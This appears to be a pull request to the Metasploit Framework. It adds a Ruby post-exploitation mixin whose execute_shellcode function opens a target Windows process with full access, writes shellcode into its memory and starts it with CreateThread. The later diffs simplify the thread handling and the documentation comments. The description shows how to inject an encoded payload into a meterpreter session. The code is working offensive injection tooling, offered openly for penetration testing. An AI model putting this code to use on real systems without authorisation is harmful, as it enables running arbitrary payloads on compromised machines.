### PR TITLE
Add Msf::Post::Windows::Process

### DIFF
--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -21,7 +21,7 @@ module Process
 	#   true if successful, otherwise false
 	##
 	def execute_shellcode(shellcode, base_addr, pid=nil)
-		pid ||= session.sys.process.open.pid
+		pid ||= session.sys.process.getpid
 		host  = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
 		shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
 		if host.memory.write(shell_addr, shellcode) < shellcode.length
@@ -30,17 +30,9 @@ module Process
 		end
 
 		vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
-		ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, "CREATE_SUSPENDED", nil)
+		ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, 0, nil)
 		if ret['return'] < 1
 			vprint_error("Unable to CreateThread")
-			return false
-		end
-		hthread = ret['return']
-
-		vprint_status("Resuming the Thread...")
-		ret = session.railgun.kernel32.ResumeThread(hthread)
-		if ret['return'] < 1
-			vprint_error("Unable to ResumeThread")
 			return false
 		end
 

--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -6,19 +6,15 @@ module Windows
 
 module Process
 
-	##
-	# execute_shellcode(shellcode, shell_addr, pid)
 	#
-	# Summary:
-	#   Injects shellcode to a process, and executes it
+	# Injects shellcode to a process, and executes it.
 	#
-	# Parameters:
-	#   shellcode - The shellcode to execute
-	#   base_addr - Tha base address to allocate memory
-	#   pid       - The process ID to inject to
+	# @param shellcode [String] The shellcode to execute
+	# @param base_addr [Fixnum] The base address to allocate memory
+	# @param pid       [Fixnum] The process ID to inject to
 	#
-	# Returns:
-	#   true if successful, otherwise false
+	# @return [Boolean] True if successful, otherwise false
+	#
 	##
 	def execute_shellcode(shellcode, base_addr, pid=nil)
 		pid ||= session.sys.process.getpid

--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -7,14 +7,14 @@ module Windows
 module Process
 
 	##
-	# execute_shellcode(shellcode, shell_addr)
+	# execute_shellcode(shellcode, shell_addr, pid)
 	#
 	# Summary:
-	#   Injects shellcode to the a process, and executes it
+	#   Injects shellcode to a process, and executes it
 	#
 	# Parameters:
 	#   shellcode - The shellcode to execute
-	#   base_addr - Tha base address to allocate
+	#   base_addr - Tha base address to allocate memory
 	#   pid       - The process ID to inject to
 	#
 	# Returns:

--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -15,7 +15,6 @@ module Process
 	#
 	# @return [Boolean] True if successful, otherwise false
 	#
-	##
 	def execute_shellcode(shellcode, base_addr, pid=nil)
 		pid ||= session.sys.process.getpid
 		host  = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)

--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -1,0 +1,53 @@
+# -*- coding: binary -*-
+
+module Msf
+class Post
+module Windows
+
+module Process
+
+	##
+	# execute_shellcode(shellcode, shell_addr)
+	#
+	# Summary:
+	#   Injects shellcode to the a process, and executes it
+	#
+	# Parameters:
+	#   shellcode - The shellcode to execute
+	#   base_addr - Tha base address to allocate
+	#   pid       - The process ID to inject to
+	#
+	# Returns:
+	#   true if successful, otherwise false
+	##
+	def execute_shellcode(shellcode, base_addr, pid=nil)
+		pid ||= session.sys.process.open.pid
+		host  = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+		shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
+		if host.memory.write(shell_addr, shellcode) < shellcode.length
+			vprint_error("Failed to write shellcode")
+			return false
+		end
+
+		vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
+		ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, "CREATE_SUSPENDED", nil)
+		if ret['return'] < 1
+			vprint_error("Unable to CreateThread")
+			return false
+		end
+		hthread = ret['return']
+
+		vprint_status("Resuming the Thread...")
+		ret = session.railgun.kernel32.ResumeThread(hthread)
+		if ret['return'] < 1
+			vprint_error("Unable to ResumeThread")
+			return false
+		end
+
+		true
+	end
+
+end # Process
+end # Windows
+end # Post
+end # Msf


### PR DESCRIPTION
The purpose of Msf::Post::Windows::Process is to have all the common functions you might need to do something to a process, for example: injecting something to a process and then run it.

Usage:
1. Add require 'msf/core/post/windows/process'
2. Add include Msf::Post::Windows::Process
3. In your function, do execute_shellcode(payload.encoded, 0x0c0c0000)

The above example should inject payload into meterpreter's memory space.
